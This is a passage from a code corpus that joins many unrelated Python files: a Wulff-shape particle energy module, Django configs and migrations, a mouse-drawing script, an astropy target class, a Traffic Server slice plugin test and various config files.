wulff1 = analyzer1.wulff_from_chempot(delu_dict=delu_dict, delu_default=delu_default, symprec=self.symprec)
wulff2 = analyzer2.wulff_from_chempot(delu_dict=delu_dict, delu_default=delu_default, symprec=self.symprec)
# Now calculate r
delta_gamma = wulff1.weighted_surface_energy - wulff2.weighted_surface_energy
delta_E = self.bulk_gform(analyzer1.ucell_entry) - self.bulk_gform(analyzer2.ucell_entry)
r = (-3 * delta_gamma) / (delta_E)
return r / 10 if units == "nanometers" else r
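    # Editor's note on the formula above: for a particle whose surface area and
    # volume scale as r^2 and r^3 (a sphere or a fixed Wulff shape), equating
    # the total free energies of the two polymorphs,
    #     (4/3)*pi*r^3*E_1 + 4*pi*r^2*gamma_1 = (4/3)*pi*r^3*E_2 + 4*pi*r^2*gamma_2,
    # with E_i the bulk energy per unit volume (bulk_gform) and gamma_i the
    # weighted surface energy, and solving for r gives
    #     r = -3 * delta_gamma / delta_E,
    # which is exactly what is computed here (in Angstrom, optionally nm).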
def wulff_gform_and_r(
self,
wulffshape,
bulk_entry,
r,
from_sphere_area=False,
r_units="nanometers",
e_units="keV",
normalize=False,
scale_per_atom=False,
):
"""
Calculates the formation energy of the particle with arbitrary radius r.
Args:
wulffshape (WulffShape): Initial, unscaled WulffShape
bulk_entry (ComputedStructureEntry): Entry of the corresponding bulk.
r (float (Ang)): Arbitrary effective radius of the WulffShape
from_sphere_area (bool): There are two ways to calculate the bulk
formation energy. Either by treating the volume and thus surface
area of the particle as a perfect sphere, or as a Wulff shape.
r_units (str): Can be nanometers or Angstrom
e_units (str): Can be keV or eV
normalize (bool): Whether or not to normalize energy by volume
            scale_per_atom (bool): Whether or not to normalize by number of
atoms in the particle
Returns:
particle formation energy (float in keV), effective radius
"""
# Set up
miller_se_dict = wulffshape.miller_energy_dict
new_wulff = self.scaled_wulff(wulffshape, r)
new_wulff_area = new_wulff.miller_area_dict
# calculate surface energy of the particle
if not from_sphere_area:
# By approximating the particle as a Wulff shape
w_vol = new_wulff.volume
tot_wulff_se = 0
for hkl, v in new_wulff_area.items():
tot_wulff_se += miller_se_dict[hkl] * v
Ebulk = self.bulk_gform(bulk_entry) * w_vol
new_r = new_wulff.effective_radius
else:
# By approximating the particle as a perfect sphere
w_vol = (4 / 3) * np.pi * r**3
sphere_sa = 4 * np.pi * r**2
tot_wulff_se = wulffshape.weighted_surface_energy * sphere_sa
Ebulk = self.bulk_gform(bulk_entry) * w_vol
new_r = r
new_r = new_r / 10 if r_units == "nanometers" else new_r
e = Ebulk + tot_wulff_se
e = e / 1000 if e_units == "keV" else e
e = e / ((4 / 3) * np.pi * new_r**3) if normalize else e
bulk_struct = bulk_entry.structure
density = len(bulk_struct) / bulk_struct.lattice.volume
e = e / (density * w_vol) if scale_per_atom else e
return e, new_r
@staticmethod
def bulk_gform(bulk_entry):
"""
Returns the formation energy of the bulk
Args:
bulk_entry (ComputedStructureEntry): Entry of the corresponding bulk.
"""
return bulk_entry.energy / bulk_entry.structure.lattice.volume
def scaled_wulff(self, wulffshape, r):
"""
Scales the Wulff shape with an effective radius r. Note that the resulting
Wulff does not necessarily have the same effective radius as the one
provided. The Wulff shape is scaled by its surface energies where first
the surface energies are scale by the minimum surface energy and then
multiplied by the given effective radius.
Args:
wulffshape (WulffShape): Initial, unscaled WulffShape
r (float): Arbitrary effective radius of the WulffShape
Returns:
WulffShape (scaled by r)
"""
# get the scaling ratio for the energies
r_ratio = r / wulffshape.effective_radius
miller_list = wulffshape.miller_energy_dict.keys()
        # Collect the surface energy of each facet of the Wulff shape
se_list = np.array(list(wulffshape.miller_energy_dict.values()))
# Scale the magnitudes by r_ratio
scaled_se = se_list * r_ratio
return WulffShape(wulffshape.lattice, miller_list, scaled_se, symprec=self.symprec)
def plot_one_stability_map(
self,
analyzer,
max_r,
delu_dict=None,
label="",
increments=50,
delu_default=0,
plt=None,
from_sphere_area=False,
e_units="keV",
r_units="nanometers",
normalize=False,
scale_per_atom=False,
):
"""
Returns the plot of the formation energy of a particle against its
        effective radius
Args:
analyzer (SurfaceEnergyPlotter): Analyzer associated with the
first polymorph
max_r (float): The maximum radius of the particle to plot up to.
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
label (str): Label of the plot for legend
increments (int): Number of plot points
delu_default (float): Default value for all unset chemical potentials
plt (pylab): Plot
from_sphere_area (bool): There are two ways to calculate the bulk
formation energy. Either by treating the volume and thus surface
area of the particle as a perfect sphere, or as a Wulff shape.
r_units (str): Can be nanometers or Angstrom
e_units (str): Can be keV or eV
            normalize (bool): Whether or not to normalize energy by volume
"""
plt = plt if plt else pretty_plot(width=8, height=7)
wulffshape = analyzer.wulff_from_chempot(delu_dict=delu_dict, delu_default=delu_default, symprec=self.symprec)
gform_list, r_list = [], []
for r in np.linspace(1e-6, max_r, increments):
gform, r = self.wulff_gform_and_r(
wulffshape,
analyzer.ucell_entry,
r,
from_sphere_area=from_sphere_area,
r_units=r_units,
e_units=e_units,
normalize=normalize,
scale_per_atom=scale_per_atom,
)
gform_list.append(gform)
r_list.append(r)
ru = "nm" if r_units == "nanometers" else r"\AA"
plt.xlabel(rf"Particle radius (${ru}$)")
eu = f"${e_units}/{ru}^3$"
plt.ylabel(rf"$G_{{form}}$ ({eu})")
plt.plot(r_list, gform_list, label=label)
return plt
def plot_all_stability_map(
self,
max_r,
increments=50,
delu_dict=None,
delu_default=0,
plt=None,
labels=None,
from_sphere_area=False,
e_units="keV",
r_units="nanometers",
normalize=False,
scale_per_atom=False,
):
"""
        Returns the plot of the formation energy of particles
        of different polymorphs against their effective radius
Args:
max_r (float): The maximum radius of the particle to plot up to.
increments (int): Number of plot points
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
plt (pylab): Plot
labels (list): List of labels for each plot, corresponds to the
list of se_analyzers
from_sphere_area (bool): There are two ways to calculate the bulk
formation energy. Either by treating the volume and thus surface
area of the particle as a perfect sphere, or as a Wulff shape.
"""
plt = plt if plt else pretty_plot(width=8, height=7)
for i, analyzer in enumerate(self.se_analyzers):
label = labels[i] if labels else ""
plt = self.plot_one_stability_map(
analyzer,
max_r,
delu_dict,
label=label,
plt=plt,
increments=increments,
delu_default=delu_default,
from_sphere_area=from_sphere_area,
e_units=e_units,
r_units=r_units,
normalize=normalize,
scale_per_atom=scale_per_atom,
)
return plt
# class GetChempotRange:
# def __init__(self, entry):
# self.entry = entry
#
#
# class SlabEntryGenerator:
# def __init__(self, entry):
# self.entry = entry
def sub_chempots(gamma_dict, chempots):
"""
Uses dot product of numpy array to sub chemical potentials
into the surface grand potential. This is much faster
than using the subs function in sympy.
Args:
gamma_dict (dict): Surface grand potential equation
as a coefficient dictionary
chempots (dict): Dictionary assigning each chemical
potential (key) in gamma a value
Returns:
Surface energy as a float
"""
coeffs = [gamma_dict[k] for k in gamma_dict.keys()]
chempot_vals = []
for k in gamma_dict.keys():
if k not in chempots.keys():
chempot_vals.append(k)
elif k == 1:
chempot_vals.append(1)
else:
chempot_vals.append(chempots[k])
return np.dot(coeffs, chempot_vals)
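# ---------------------------------------------------------------------------
# Editor's sketch (not part of the original module): a minimal, self-contained
# check of sub_chempots. The coefficient dictionary below is made up purely
# for illustration and represents gamma = 1.2 + 0.5 * delu_O.
if __name__ == "__main__":
    from sympy import Symbol
    delu_O = Symbol("delu_O")
    gamma_dict = {1: 1.2, delu_O: 0.5}
    # Substituting delu_O = -1.0 gives 1.2 + 0.5 * (-1.0) = 0.7
    print(sub_chempots(gamma_dict, {delu_O: -1.0}))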
|
py | 7dfad19c1f500217ed48cac2ccce000efcf2de51 | import os
from config import Instance
def get_torch_model_path(instance: Instance):
return os.path.join(instance.get_resources_path(), 'torch_model.torch')
def get_training_metrics_path(instance: Instance):
return os.path.join(instance.get_resources_path(), 'training_metrics.hdf5')
def get_transformed_dataset_path(instance: Instance):
return os.path.join(instance.get_resources_path('transformed_data'), 'transformed_data.npy')
def get_preprocessed_dataset_path(instance: Instance):
return os.path.join(instance.get_resources_path('preprocessed_data'), 'preprocessed_data.npy')
processed_data_folder = 'processed_data'
os.makedirs(processed_data_folder, exist_ok=True)
def get_cross_validation_scores_path():
return os.path.join(processed_data_folder, 'cv_scores.csv')
def get_best_model_torch_model_path():
return os.path.join(processed_data_folder, 'best_model.torch')
def get_best_model_training_metrics_path():
return os.path.join(processed_data_folder, 'best_model_training_metrics.hdf5')
def get_jupyter_path():
return './notebooks/results.ipynb'
def get_jupyter_html_path():
return os.path.join(processed_data_folder, 'results.html')
jupyter_plot_folder = os.path.join(processed_data_folder, 'jupyter_plots')
os.makedirs(jupyter_plot_folder, exist_ok=True)
def jupyter_plot(filename):
return os.path.join(jupyter_plot_folder, filename)
# def get_best_model_test_set_predictions_path():
# return os.path.join(processed_data_folder, 'best_model_test_set_predictions.hdf5')
|
py | 7dfad2c0c8c463e527fe901beef3a48f05007253 | """
WSGI config for data_converter project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "data_converter.settings")
application = get_wsgi_application() |
py | 7dfad2db7d89f2d74a210e665d5c4fe73a8e4bfc | # -*- coding: utf-8 -*-
# Generated by Django 1.11.27 on 2020-02-21 21:09
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('translations', '0007_populate_smstranslations'),
]
operations = [
migrations.RemoveField(
model_name='smstranslations',
name='couch_id',
),
]
|
py | 7dfad303117101f654751decd17ba2c240c12ee7 | import time
import sys
import os
cwd = os.getcwd()
from mouseAutomater import ImageController
from mouseAutomater import MouseAutomater
lsleep = 0.002
rsleep = 0.025
print("Created by HudZah\n\n\n")
imageName = ImageController.getImage()
handler = ImageController(imageName)
resizeValue = int(input("Output pixel size (for square image): "))
offset = int(input("Scale for image (1 for one to one): "))
resizeValue = resizeValue / offset
handler.convertToBW()
handler.resize(resizeValue)
returnKey = None
while returnKey == None:
MouseAutomater.openPaint()
print("Warning: There is no fail-safe other than pulling your mouse to the upper left corner, in case anything goes wrong once you start this program please abort using Ctrl + Alt + Delete \n\n\n")
print("Enter to start 3 second countdown, N to abort, pull to left hand corner to abort once the program starts")
print("Please position your cursor on a canvas on either Paint, Photoshop or any other design software as soon as you start running this. Make sure there is optimal space to completely draw the image.")
returnKey = input()
returnKey = returnKey.lower()
if returnKey == "n":
exit()
time.sleep(3)
array = handler.newImageArray()
MouseAutomater.imageToLines(array, offset, rsleep, lsleep)
repeat = "y"
while repeat == "y":
repeat = input("Type 'y' to repeat, or enter to exit")
repeat = repeat.lower()
if repeat == "y":
time.sleep(3)
MouseAutomater.imageToLines(array, offset, rsleep, lsleep)
else:
exit()
|
py | 7dfad4b3b69c976ad8fc6ceafb1cb3c35120a84f | """ 02
Write a program that asks the user for a sentence and
prints the whole sentence in uppercase with no whitespace.
"""
frase = input("Digite uma frase: ")
print(frase.upper().replace(" ", ""))
|
py | 7dfad4fa53372d4cce3178911aad6e24933dd61f | """
Package-wide constants.
| Copyright 2017-2020, Voxel51, Inc.
| `voxel51.com <https://voxel51.com/>`_
|
"""
from datetime import datetime
import os
try:
from importlib.metadata import metadata # Python 3.8
except ImportError:
from importlib_metadata import metadata # Python < 3.8
FIFTYONE_DIR = os.path.dirname(os.path.abspath(__file__))
FIFTYONE_CONFIG_DIR = os.path.join(os.path.expanduser("~"), ".fiftyone")
FIFTYONE_CONFIG_PATH = os.path.join(FIFTYONE_CONFIG_DIR, "config.json")
BASE_DIR = os.path.dirname(FIFTYONE_DIR)
RESOURCES_DIR = os.path.join(FIFTYONE_DIR, "resources")
DEV_INSTALL = os.path.isdir(
os.path.normpath(
os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", ".git")
)
)
# Package metadata
_META = metadata("fiftyone")
NAME = _META["name"]
VERSION = _META["version"]
DESCRIPTION = _META["summary"]
AUTHOR = _META["author"]
AUTHOR_EMAIL = _META["author-email"]
URL = _META["home-page"]
LICENSE = _META["license"]
VERSION_LONG = "%s v%s, %s" % (NAME, VERSION, AUTHOR)
COPYRIGHT = "2017-%d, %s" % (datetime.now().year, AUTHOR)
# MongoDB setup
try:
from fiftyone.db import FIFTYONE_DB_BIN_DIR
except ImportError:
# development installation
FIFTYONE_DB_BIN_DIR = os.path.join(FIFTYONE_CONFIG_DIR, "bin")
DB_PATH = os.path.join(FIFTYONE_CONFIG_DIR, "var/lib/mongo")
DB_LOG_PATH = os.path.join(FIFTYONE_CONFIG_DIR, "var/log/mongodb/mongo.log")
MIGRATIONS_PATH = os.path.join(FIFTYONE_CONFIG_DIR, "migrations")
MIGRATIONS_HEAD_PATH = os.path.join(MIGRATIONS_PATH, "head.json")
MIGRATIONS_REVISIONS_DIR = os.path.join(FIFTYONE_DIR, "migrations/revisions")
# Server setup
SERVER_DIR = os.path.join(FIFTYONE_DIR, "server")
SERVER_NAME = "localhost"
# App setup
try:
from fiftyone.gui import FIFTYONE_APP_DIR
except ImportError:
FIFTYONE_APP_DIR = os.path.normpath(
os.path.join(FIFTYONE_DIR, "../electron")
)
|
py | 7dfad65d0a96d74ebf3604ab767cb7bf759fa57f | # Generated by Django 3.2.2 on 2021-05-16 15:24
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('info', '0002_alter_info_phone_num'),
]
operations = [
migrations.RenameField(
model_name='info',
old_name='firday',
new_name='friday',
),
]
|
py | 7dfad852f45a72c216ed882398aa06467537aade | """TestDjango URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
import os
#from django.contrib import admin
from django.urls import path
from django.conf.urls import url,re_path,include
from zp import views as zp_views
from DataView import settings
if settings.DEBUG:
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from django.conf.urls.static import static
urlpatterns = [
#path('admin/', admin.site.urls,name='admin'),
re_path(r'^$',zp_views.home,name='home'),
path('zwyx/dd_index/',zp_views.zwyx_dd,name='zwyx_dd'),
path('zwyx/xl_index/',zp_views.zwyx_xl,name='zwyx_xl'),
path('zwyx/gsgm_index/',zp_views.zwyx_gsgm,name='zwyx_gsgm'),
path('zwyx/gsxz_index/',zp_views.zwyx_gsxz,name='zwyx_gsxz'),
path('zwyx/gshy_index/',zp_views.zwyx_gshy,name='zwyx_gshy'),
path('no_found/', zp_views.no_found,name='no_found'),
path('zwyx/type_index/',zp_views.zwyx_type,name='type_index'),
path('zwyx/zwyx_zw_count/',zp_views.zwyx_zw_count,name='zwyx_zw_count'),
path('zp/wordcloud/',zp_views.zp_word,name='zp_word'),
    # Admin backend
path('admin/index/',zp_views.zp_admin_index,name='admin_index'),
path('admin/login/',zp_views.zp_admin_login,name='admin_login'),
path('admin/logout/',zp_views.zp_admin_logout,name='admin_logout'),
path('admin/refresh_captcha/',zp_views.refresh_captcha,name='refresh_captcha'),
path('admin/admin_dd/', zp_views.admin_dd, name='admin_dd'),
path('admin/admin_gsgm/', zp_views.admin_dd, name='admin_gsgm'),
path('admin/admin_gsxz/', zp_views.admin_dd, name='admin_gsxz'),
path('admin/admin_gshy/', zp_views.admin_dd, name='admin_gshy'),
path('admin/admin_xl/', zp_views.admin_dd, name='admin_xl'),
path('admin/admin_zwlb/', zp_views.admin_dd, name='admin_zwlb'),
path('admin/admin_list/', zp_views.admin_dd, name='admin_list'),
]
if settings.DEBUG:
urlpatterns += staticfiles_urlpatterns()
if not settings.DEBUG:
handler404 = "zp.views.page_not_found"
handler500 = "zp.views.sever_error"
captcha = [url(r'^captcha/', include('captcha.urls'),name='captcha')]
urlpatterns += captcha |
py | 7dfad8f14e1b88b9b6362f63d1ef2bf5e95540d5 | #!/usr/bin/python3
import os
import sys
import math
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import data_utils
load_fn = data_utils.load_cls_train_val
balance_fn = None
map_fn = None
keep_remainder = True
save_ply_fn = None
num_class = 40
batch_size = 128
sample_num = 1024
num_epochs = 512
step_val = 500
learning_rate_base = 0.01
decay_steps = 8000
decay_rate = 0.5
learning_rate_min = 1e-6
weight_decay = 1e-5
jitter = 0.0
jitter_val = 0.0
jitter_test = 0.0
rotation_range = [0, 0, 0, 'u']
rotation_range_val = [0, 0, 0, 'u']
rotation_range_test = [0, 0, 0, 'u']
rotation_order = 'rxyz'
scaling_range = [0, 0, 0, 'g']
scaling_range_val = [0, 0, 0, 'u']
scaling_range_test = [0, 0, 0, 'u']
sample_num_variance = 1 // 8
sample_num_clip = 1 // 4
x = 3
xconv_param_name = ('K', 'D', 'P', 'C', 'links')
xconv_params = [dict(zip(xconv_param_name, xconv_param)) for xconv_param in
[(8, 1, -1, 16 * x, []),
(12, 2, 384, 32 * x, []),
(16, 2, 128, 64 * x, []),
(16, 3, 128, 128 * x, [])]]
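# Editor's note: with x = 3 the zip above expands each tuple into a dict, e.g.
# the first layer becomes {'K': 8, 'D': 1, 'P': -1, 'C': 48, 'links': []}
# (C = 16 * x = 48); P = -1 is conventionally used in PointCNN configs to keep
# all input points for that layer.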
with_global = True
fc_param_name = ('C', 'dropout_rate')
fc_params = [dict(zip(fc_param_name, fc_param)) for fc_param in
[(128 * x, 0.0),
(64 * x, 0.8)]]
sampling = 'random'
optimizer = 'adam'
epsilon = 1e-2
data_dim = 6
use_extra_features = False
with_X_transformation = True
sorting_method = None
|
py | 7dfad9071a98c1024d7ff1e2c231650f9be56dea | from lino.api import rt
def objects():
Country = rt.models.chooser.Country
City = rt.models.chooser.City
be = Country(name="Belgium")
yield be
yield City(name="Brussels", country=be)
yield City(name="Eupen", country=be)
yield City(name="Gent", country=be)
fr = Country(name="France")
yield fr
yield City(name="Paris", country=fr)
yield City(name="Bordeaux", country=fr)
ee = Country(name="Estonia")
yield ee
yield City(name="Tallinn", country=ee)
yield City(name="Tartu", country=ee)
yield City(name="Narva", country=ee)
|
py | 7dfad9e4b96c5f1b125197d7ef578c87d9ef443d | # -*- coding: utf-8 -*-
#
# @Author: Richard J. Mathar <[email protected]>
# @Date: 2021-11.21
# @Filename: target.py
# @License: BSD 3-clause (http://www.opensource.org/licenses/BSD-3-Clause)
"""
Python3 class for siderostat field angles using homogeneous coordinates
"""
import sys
import math
import numpy
import astropy.coordinates
import astropy.time
import astropy.units
from .ambient import Ambient
from .site import Site
__all__ = ['Target']
class Target():
""" sidereal astronomical target
"""
def __init__(self, targ) :
""" target coordinates
        :param targ: Position in equatorial coordinates
        :type targ: astropy.coordinates.SkyCoord
"""
if isinstance(targ, astropy.coordinates.SkyCoord) :
self.targ = targ
else :
raise TypeError("invalid data types")
# print(self.targ)
def toHoriz(self, site, ambi = None, time = None) :
""" convert from equatorial to horizontal coordinates
        :param site: Observatory location
        :type site: fieldrotation.Site
        :param ambi: Ambient parameters used for refraction correction
        :type ambi: fieldrotation.Ambient
        :param time: time of the observation
        :type time: astropy.time.Time
        :return: alt-az coordinates
        :rtype: astropy.coordinates.AltAz
"""
if isinstance(time, astropy.time.Time) :
now = time
elif isinstance(time, str):
now = astropy.time.Time(time, format='isot', scale='utc')
elif time is None:
now = astropy.time.Time.now()
if isinstance(site, Site) :
if ambi is None:
refr = Ambient(site = site)
            elif isinstance(ambi, Ambient) :
refr = ambi
else :
raise TypeError("invalid ambi data type")
earthloc = site.toEarthLocation()
else :
raise TypeError("invalid site data type")
# print(earthloc)
# print(astropy.units.Quantity(100.*refr.press,unit=astropy.units.Pa))
# print(astropy.units.Quantity(refr.wlen,unit= astropy.units.um))
# todo: render also proper motions (all 3 coords)
# This is a blank form of Alt/aZ because the two angles are yet unknown
# altaz = astropy.coordinates.builtin_frames.AltAz
altaz = astropy.coordinates.AltAz(
location = earthloc,
obstime=now,
pressure= astropy.units.Quantity(100.*refr.press,unit=astropy.units.Pa),
temperature = astropy.units.Quantity(refr.temp, unit = astropy.units.deg_C),
relative_humidity = refr.rhum,
obswl = astropy.units.Quantity(refr.wlen,unit= astropy.units.um))
try:
horiz = self.targ.transform_to(altaz)
except ValueError as ex:
# This is sometimes triggered by being offline or the
# IERS data server being unreachable.
# Try again with a sort of offline attempt of the IERS tables
from astropy.utils.iers import conf
conf.auto_download = False
horiz = self.targ.transform_to(altaz)
return horiz
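# Editor's sketch (hypothetical usage, not part of the original module; the
# Site constructor arguments are assumed):
#
#     import astropy.units as u
#     targ = astropy.coordinates.SkyCoord(ra=10.0 * u.deg, dec=20.0 * u.deg)
#     t = Target(targ)
#     # site = Site(name="LCO")            # assumed constructor
#     # horiz = t.toHoriz(site)            # AltAz with refraction applied
#     # print(horiz.alt.deg, horiz.az.deg)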
|
py | 7dfadbfe29466ae52705107458a1e98a5773ea7f | '''
'''
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
Test.Summary = '''
Basic slice plugin test
'''
# Test description:
# Preload the cache with the entire asset to be range requested.
# Reload remap rule with slice plugin
# Request content through the slice plugin
Test.SkipUnless(
Condition.PluginExists('slice.so'),
)
Test.ContinueOnFail = False
# configure origin server
server = Test.MakeOriginServer("server")
# Define ATS and configure
ts = Test.MakeATSProcess("ts", command="traffic_server")
# default root
request_header_chk = {"headers":
"GET / HTTP/1.1\r\n" +
"Host: ats\r\n" +
"\r\n",
"timestamp": "1469733493.993",
"body": "",
}
response_header_chk = {"headers":
"HTTP/1.1 200 OK\r\n" +
"Connection: close\r\n" +
"\r\n",
"timestamp": "1469733493.993",
"body": "",
}
server.addResponse("sessionlog.json", request_header_chk, response_header_chk)
block_bytes = 7
body = "lets go surfin now"
request_header = {"headers":
"GET /path HTTP/1.1\r\n" +
"Host: origin\r\n" +
"\r\n",
"timestamp": "1469733493.993",
"body": "",
}
response_header = {"headers":
"HTTP/1.1 200 OK\r\n" +
"Connection: close\r\n" +
'Etag: "path"\r\n' +
"Cache-Control: max-age=500\r\n" +
"\r\n",
"timestamp": "1469733493.993",
"body": body,
}
server.addResponse("sessionlog.json", request_header, response_header)
curl_and_args = 'curl -s -D /dev/stdout -o /dev/stderr -x http://127.0.0.1:{}'.format(ts.Variables.port)
# set up whole asset fetch into cache
ts.Disk.remap_config.AddLines([
'map http://preload/ http://127.0.0.1:{}'.format(server.Variables.Port),
'map http://slice/ http://127.0.0.1:{}'.format(server.Variables.Port) +
' @plugin=slice.so @pparam=--blockbytes-test={}'.format(block_bytes)
])
ts.Disk.records_config.update({
'proxy.config.diags.debug.enabled': 0,
'proxy.config.diags.debug.tags': 'slice',
})
# 0 Test - Prefetch entire asset into cache
tr = Test.AddTestRun("Fetch first slice range")
ps = tr.Processes.Default
ps.StartBefore(server, ready=When.PortOpen(server.Variables.Port))
ps.StartBefore(Test.Processes.ts)
ps.Command = curl_and_args + ' http://preload/path'
ps.ReturnCode = 0
ps.Streams.stderr = "gold/slice_200.stderr.gold"
ps.Streams.stdout.Content = Testers.ContainsExpression("200 OK", "expected 200 OK response")
tr.StillRunningAfter = ts
# 1 Test - First complete slice
tr = Test.AddTestRun("Fetch first slice range")
ps = tr.Processes.Default
ps.Command = curl_and_args + ' http://slice/path' + ' -r 0-6'
ps.ReturnCode = 0
ps.Streams.stderr = "gold/slice_first.stderr.gold"
ps.Streams.stdout.Content = Testers.ContainsExpression("206 Partial Content", "expected 206 response")
ps.Streams.stdout.Content += Testers.ContainsExpression("Content-Range: bytes 0-6/18", "mismatch byte content response")
tr.StillRunningAfter = ts
# 2 Test - Last slice auto
tr = Test.AddTestRun("Last slice -- 14-")
ps = tr.Processes.Default
ps.Command = curl_and_args + ' http://slice/path' + ' -r 14-'
ps.ReturnCode = 0
ps.Streams.stderr = "gold/slice_last.stderr.gold"
ps.Streams.stdout.Content = Testers.ContainsExpression("206 Partial Content", "expected 206 response")
ps.Streams.stdout.Content += Testers.ContainsExpression("Content-Range: bytes 14-17/18", "mismatch byte content response")
tr.StillRunningAfter = ts
# 3 Test - Last slice exact
tr = Test.AddTestRun("Last slice 14-17")
ps = tr.Processes.Default
ps.Command = curl_and_args + ' http://slice/path' + ' -r 14-17'
ps.ReturnCode = 0
ps.Streams.stderr = "gold/slice_last.stderr.gold"
ps.Streams.stdout.Content = Testers.ContainsExpression("206 Partial Content", "expected 206 response")
ps.Streams.stdout.Content += Testers.ContainsExpression("Content-Range: bytes 14-17/18", "mismatch byte content response")
tr.StillRunningAfter = ts
# 4 Test - Last slice truncated
tr = Test.AddTestRun("Last truncated slice 14-20")
ps = tr.Processes.Default
ps.Command = curl_and_args + ' http://slice/path' + ' -r 14-20'
ps.ReturnCode = 0
ps.Streams.stderr = "gold/slice_last.stderr.gold"
ps.Streams.stdout.Content = Testers.ContainsExpression("206 Partial Content", "expected 206 response")
ps.Streams.stdout.Content += Testers.ContainsExpression("Content-Range: bytes 14-17/18", "mismatch byte content response")
tr.StillRunningAfter = ts
# 5 Test - Whole asset via slices
tr = Test.AddTestRun("Whole asset via slices")
ps = tr.Processes.Default
ps.Command = curl_and_args + ' http://slice/path'
ps.ReturnCode = 0
ps.Streams.stderr = "gold/slice_200.stderr.gold"
ps.Streams.stdout.Content = Testers.ContainsExpression("200 OK", "expected 200 OK response")
tr.StillRunningAfter = ts
# 6 Test - Whole asset via range
tr = Test.AddTestRun("Whole asset via range")
ps = tr.Processes.Default
ps.Command = curl_and_args + ' http://slice/path' + ' -r 0-'
ps.ReturnCode = 0
ps.Streams.stderr = "gold/slice_206.stderr.gold"
ps.Streams.stdout.Content = Testers.ContainsExpression("206 Partial Content", "expected 206 response")
ps.Streams.stdout.Content += Testers.ContainsExpression("Content-Range: bytes 0-17/18", "mismatch byte content response")
tr.StillRunningAfter = ts
# 7 Test - Non aligned slice request
tr = Test.AddTestRun("Non aligned slice request")
ps = tr.Processes.Default
ps.Command = curl_and_args + ' http://slice/path' + ' -r 5-16'
ps.ReturnCode = 0
ps.Streams.stderr = "gold/slice_mid.stderr.gold"
ps.Streams.stdout.Content = Testers.ContainsExpression("206 Partial Content", "expected 206 response")
ps.Streams.stdout.Content += Testers.ContainsExpression("Content-Range: bytes 5-16/18", "mismatch byte content response")
tr.StillRunningAfter = ts
# 8 Test - special case, begin inside last slice block but outside asset len
tr = Test.AddTestRun("Invalid end range request, 416")
beg = len(body) + 1
end = beg + block_bytes
ps = tr.Processes.Default
ps.Command = curl_and_args + ' http://slice/path' + ' -r {}-{}'.format(beg, end)
ps.Streams.stdout.Content = Testers.ContainsExpression("416 Requested Range Not Satisfiable", "expected 416 response")
tr.StillRunningAfter = ts
|
py | 7dfadbfe5ad7043ffcb9f37317e9e8b6d6620eb0 | def process_default(api_dict):
    # Default values
from app import app
SPECIAL_PARAMS = app.config["SPECIAL_PARAMS"]
params_with_default = {k: v[0] for k, v in SPECIAL_PARAMS.items() if isinstance(v[0], str)}
# param_trans参数 如果设置了特殊参数 是在默认值的基础上进行拼接
if SPECIAL_PARAMS.get("param_trans", ""):
params_trans_default = SPECIAL_PARAMS.get("param_trans", "")[0]
if isinstance(params_trans_default, str):
params_trans_default_list = params_trans_default.split(",")
params_trans_list = api_dict.get("param_trans", "").split(",")
pt_list = params_trans_default_list + params_trans_list
            # Deduplicate the result
from utils.get_unilist import get_unilist
api_dict["param_trans"] = ",".join(get_unilist(pt_list))
    # The transformer parameter has default values
# predict
transformer = api_dict.get("transformer", "")
if "predict" in transformer:
if "(" in transformer and ")" in transformer:
args = transformer.replace(")", "")
if "realdata_show" not in args:
args += "+realdata_show=1d)"
api_dict["transformer"] = args
params_with_default.update(api_dict)
return 200, "success", params_with_default |
py | 7dfade61c7eb90d61e8ccbdc0c7e103cff180001 | # proxy module
from pyface.tasks.task_window_layout import *
|
py | 7dfadf2a2f8cc91f4af495aea294a99b977ebb6a | # Generated by Django 3.2.12 on 2022-03-10 07:36
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import mycarehub.common.models.base_models
import mycarehub.utils.general_utils
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
('clients', '0027_alter_servicerequest_request_type'),
('common', '0016_auto_20220215_1721'),
('staff', '0003_auto_20220215_1157'),
]
operations = [
migrations.CreateModel(
name='Appointment',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('active', models.BooleanField(default=True)),
('created', models.DateTimeField(default=django.utils.timezone.now)),
('created_by', models.UUIDField(blank=True, null=True)),
('updated', models.DateTimeField(default=django.utils.timezone.now)),
('updated_by', models.UUIDField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('appointment_type', models.CharField(max_length=36)),
('status', models.CharField(max_length=36)),
('reason', models.TextField(blank=True, max_length=1024, null=True)),
('provider', models.CharField(blank=True, help_text='Name of individual conducting the appointment for when the staff is not in our system', max_length=36, null=True)),
('date', models.DateField()),
('start_time', models.TimeField()),
('end_time', models.TimeField()),
